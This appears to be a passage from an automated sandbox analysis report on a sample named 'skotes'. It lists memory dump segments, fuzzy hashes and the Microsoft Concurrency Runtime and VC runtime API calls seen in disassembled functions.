                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                • String ID:
                                                                                                                • API String ID: 2530155754-0
                                                                                                                • Opcode ID: 34bc7790c5968056db25710d7d4cdc4a9a826e0c933eada0666e23b4fdff83ea
                                                                                                                • Instruction ID: dc7d73fea3fb55995d778f77b05238de34fdd0feeeab503b517199bc59589f5a
                                                                                                                • Opcode Fuzzy Hash: 34bc7790c5968056db25710d7d4cdc4a9a826e0c933eada0666e23b4fdff83ea
                                                                                                                • Instruction Fuzzy Hash: 9581BC30901249EBDF169F54C994BFE7BB2AF56304F040098ED417B263CB3A9D26DB61
                                                                                                                APIs
                                                                                                                • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 007B2982
                                                                                                                  • Part of subcall function 007B24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B2504
                                                                                                                • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 007B29A3
                                                                                                                • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 007B29B0
                                                                                                                • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 007B29FE
                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 007B2AA6
                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 007B2AD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                • String ID:
                                                                                                                • API String ID: 1256429809-0
                                                                                                                • Opcode ID: 8a921db9fb9d858bfdbbe4a72528e9b93950afb211200d01a5ba37dc67042252
                                                                                                                • Instruction ID: c3cb96aea6ac069a18c58fdca2e54e01d0504b98a9a70bd3d17f4b76bfbe1c5e
                                                                                                                • Opcode Fuzzy Hash: 8a921db9fb9d858bfdbbe4a72528e9b93950afb211200d01a5ba37dc67042252
                                                                                                                • Instruction Fuzzy Hash: F571AB70901249AFDF15DF58C885BFEBBB2AF45304F044098EC416B263DB399D16DB61
                                                                                                                APIs
                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 007A2876
                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007A28DF
                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007A2913
                                                                                                                  • Part of subcall function 007A07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 007A080D
                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 007A2993
                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007A29DB
                                                                                                                  • Part of subcall function 007A07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007A07DE
                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007A29EF
                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007A2A00
                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 007A2A4D
                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 007A2A7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                • String ID:
                                                                                                                • API String ID: 1321587334-0
                                                                                                                • Opcode ID: b749f7e0a9a9d46ef6b3702da46f114651d40d3a275ac8560d8f2e85c6fa03e5
                                                                                                                • Instruction ID: 95326ce378fd4d7be664dcd3fc7b923542c770cc53fbd7ccc402d15cab80a885
                                                                                                                • Opcode Fuzzy Hash: b749f7e0a9a9d46ef6b3702da46f114651d40d3a275ac8560d8f2e85c6fa03e5
                                                                                                                • Instruction Fuzzy Hash: 7F81D471A0159ADBCB18DF6CD8D056DB7B1BF8E314B14822DE845EB242D73C6D42CB94
                                                                                                                APIs
                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 007A6A1F
                                                                                                                • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 007A6A51
                                                                                                                • List.LIBCONCRT ref: 007A6A8C
                                                                                                                • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 007A6A9D
                                                                                                                • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 007A6AB9
                                                                                                                • List.LIBCONCRT ref: 007A6AF4
                                                                                                                • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 007A6B05
                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007A6B20
                                                                                                                • List.LIBCONCRT ref: 007A6B5B
                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 007A6B68
                                                                                                                  • Part of subcall function 007A5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007A5EF7
                                                                                                                  • Part of subcall function 007A5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007A5F09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                • String ID:
                                                                                                                • API String ID: 3403738998-0
                                                                                                                • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                • Instruction ID: 3826a8b273af070170710a61db5f3c31324a09c8d3e4a109b900cb51ee49e862
                                                                                                                • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                • Instruction Fuzzy Hash: 5A515371A00209EFDF08DF64C495BED73A8BF89304F158169E915EB241DB78AE44CBD0
                                                                                                                APIs
                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 007B53A0
                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 007B53C7
                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 007B54D3
                                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 007B55AE
                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 007B5650
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
